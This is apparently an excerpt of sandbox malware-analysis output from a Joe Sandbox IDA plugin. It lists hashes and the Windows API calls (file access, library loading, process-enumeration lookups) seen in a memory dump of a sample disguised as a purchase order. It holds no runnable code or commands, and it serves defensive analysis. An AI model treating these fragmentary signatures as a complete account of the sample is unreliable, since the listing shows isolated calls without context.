                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmpmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1065087418-0
                                                                                                      • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                      • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                      • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                      • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                        • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                        • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 1381354015-0
                                                                                                      • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                      • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2221118986-0
                                                                                                      • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                                      • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                      • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                                      • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004301AD
                                                                                                      • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1297977491-0
                                                                                                      • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                      • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                      • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                      • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                        • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2154303073-0
                                                                                                      • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                      • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                      APIs
                                                                                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3150196962-0
                                                                                                      • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                      • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                      APIs
                                                                                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$PointerRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 3154509469-0
                                                                                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                      APIs
                                                                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 4232544981-0
                                                                                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                      APIs
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$FileModuleName
                                                                                                      • String ID:
                                                                                                      • API String ID: 3859505661-0
                                                                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                      APIs
                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                      APIs
                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3934441357-0
                                                                                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                      • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                      APIs
                                                                                                      • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumNamesResource
                                                                                                      • String ID:
                                                                                                      • API String ID: 3334572018-0
                                                                                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
